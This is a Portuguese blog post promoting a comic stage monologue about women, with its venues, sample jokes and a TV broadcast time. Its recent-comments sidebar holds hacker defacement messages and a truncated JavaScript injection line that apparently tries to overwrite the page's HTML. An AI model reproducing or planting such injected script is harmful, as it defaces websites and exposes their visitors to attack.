oqueaconteceporai @ 18:31

Seg, 22/04/13

Estreiou em Novembro de 2011 no Teatro A Barraca, um Monólogo Cómico sobre as mulheres e as suas relações intitulado "Vamos lá Perceber as Mulheres... Mas só um bocadinho", esgotando a bilheteira logo a partir do 2º dia de atuação.

Em Fevereiro de 2012 o seu monólogo passa para o cinema S. Jorge, onde, até hoje, tem esgotado sempre a sala e desde Abril de 2012 apresenta-se com regularidade no teatro Confluência, em Cascais, também com salas sempre esgotadas.

 

Um espetáculo que coloca questões tais como:


Será que as mulheres ficam mesmo, mesmo felizes quando têm um filho?  


Não há nada como crianças com um nadinha de febre. Aquele 37.8º que não chega para nos maçar a termos de ir para o hospital, mas que as mantém assim paradas, mortiças, um amor.


Quando é que os homens vão aprender que não é para dizer frases assim: «Relaxa querida.» ou «Estás mais calma?» Porque é que isto nos enerva tanto? Porque somos todas desequilibradas… mas achamos que ninguém sabe.   

Mais de 17.500 pessoas já viram esta peça que regressa, agora, aos palcos nacionais. E no Mais Mulher desta terça-feira vislumbramos um pouco deste monólogo, às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO